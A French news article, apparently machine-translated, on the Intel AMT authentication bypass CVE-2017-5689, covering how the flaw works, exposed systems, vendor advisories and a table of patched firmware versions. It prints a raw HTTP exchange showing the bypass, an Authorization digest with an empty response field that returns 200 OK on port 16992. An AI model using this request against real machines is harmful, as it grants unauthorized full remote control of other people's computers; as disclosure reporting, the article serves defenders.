La vulnérabilité dans Intel AMT s'est avérée plus grave qu'ils ne le pensaient



Le 1er mai 2017, Intel a annoncé une vulnérabilité critique dans la technologie de gestion active (AMT) (vulnérabilité INTEL-SA-00075, également appelée CVE-2017-5689 ). La vulnérabilité a été trouvée par Maxim Malyutin d'Embedi, mais l'a gardée secrète à la demande d'Intel jusqu'à l'annonce officielle.

Intel AMT est une technologie matérielle qui fournit un accès distant et hors bande (via un canal TCP / IP auxiliaire indépendant) pour gérer les paramètres et la sécurité de l'ordinateur indépendamment de l'état d'alimentation (allumage / extinction de l'ordinateur distant) et de l'état du système d'exploitation. La technologie est intégrée au chipset. Si vous l'utilisez comme anti-rootkit pour analyser les lecteurs RAM et PC, il n'y a aucun moyen de contourner cette protection. Pire, les requêtes AMT distantes ne sont pas enregistrées.

Désormais, la demande de Shodan est émise par plus de 8500 systèmes avec des ports AMT ouverts. Pour certains micrologiciels du BIOS, aucun correctif n'a été publié pour corriger le bogue dans AMT.

La technologie AMT permet aux administrateurs système d'effectuer à distance diverses actions dans le système: éteindre les ordinateurs, modifier le code du chargeur de démarrage, contrôler les périphériques d'entrée, les programmes exécutables, etc. En fait, AMT vous permet d'effectuer à distance toutes les actions que vous pouvez effectuer, Avoir un accès physique au PC.

Après avoir lu la description de la technologie, vous pouvez commencer à fantasmer les opportunités qu'un pirate informatique obtient en ayant un accès à distance à un ordinateur éteint avec la technologie AMT. Donc, vos fantasmes se sont avérés être vrais . L'accès à distance à AMT est fourni via une interface Web dans un navigateur. Comme Maxim l'a découvert, tout hachage cryptographique ou aucun du tout convient à l' authentification par résumé d'accès . En d'autres termes, le champ correspondant du formulaire d'autorisation peut généralement être laissé vide.

Cela ne ressemble même pas à une porte dérobée, car qui va l'implémenter d'une manière si maladroite?

Systèmes vulnérables après la publication de 2010-2011 (liste des micrologiciels vulnérables, voir ci-dessous). Ce n'est pas 100% RCE, mais plutôt une vulnérabilité logique. Maxim Malyutin pense qu'il existe plusieurs vecteurs d'attaque, comment un attaquant pourrait exploiter cette vulnérabilité, peut-être même sur des systèmes Intel sans prise en charge d'Intel AMT.

"L'authentification fonctionne toujours " , a expliqué Malyutin. "Nous venons de trouver un moyen de contourner cela."

Grâce à un navigateur Web, vous pouvez obtenir un accès complet aux fonctions AMT, comme si vous reconnaissiez le mot de passe administrateur dans le système. Voici comment le faire en utilisant le proxy local à 127.0.0.1:16992:

GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth" Content-Type: text/html Server: AMT Content-Length: 678 Connection: close GET /index.htm HTTP/1.1 Host: 127.0.0.1:16992 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:09:17 GMT Server: AMT Content-Type: text/html Transfer-Encoding: chunked Cache-Control: no cache Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 

Quelques jours après la divulgation d'informations, Tenact a publié un exploit pour exploiter une vulnérabilité critique avec une augmentation des privilèges AMT. L'entreprise a suggéré d'utiliser cet outil pour détecter les systèmes vulnérables sur son réseau. Pour que les administrateurs système sachent où installer les nouvelles versions de firmware. L'exploit est implémenté comme un plugin Nessus .

Le même jour, les plus grands fabricants de serveurs et d'ordinateurs personnels ont émis des messages de sécurité officiels pour leurs clients: un message de HP , de Dell , de Lenovo , de Fujitsu . Il y aura des informations détaillées sur les micrologiciels vulnérables et des liens vers des versions mises à jour apparaîtront dès qu'ils seront disponibles.

Liste des micrologiciels patchés d'Intel
Versions vulnérables
firmware
Pertinent
Génération de CPU
Patché
firmware
6.0.xx.xxxx

1 st Gen Core

6.2.61.3535

6.1.xx.xxxx

6.2.61.3535

6.2.xx.xxxx

6.2.61.3535

7.0.xx.xxxx

2 e génération Core

7.1.91.3272

7.1.xx.xxxx

7.1.91.3272

8.0.xx.xxxx

3 e génération Core

8.1.71.3608

8.1.xx.xxxx

8.1.71.3608

9.0.xx.xxxx

4 e génération Core



9.1.41.3024

9.1.xx.xxxx

9.1.41.3024

9.5.xx.xxxx

9.5.61.3012

10.0.xx.xxxx

5 e génération Core

10.0.55.3000

11.0.xx.xxxx

Core de 6 e génération

11.0.25.3001

11.0.22.3001

11.0.18.3003

11.5.xx.xxxx

7 e génération Core

11.6.27.3264

11.6.xx.xxxx

11.6.27.3264

11.6.12.3202

Intel a publié un outil officiel de vérification des vulnérabilités du système sous Windows 7/10, ainsi qu'un guide pour son utilisation.

Source: https://habr.com/ru/post/fr403713/


All Articles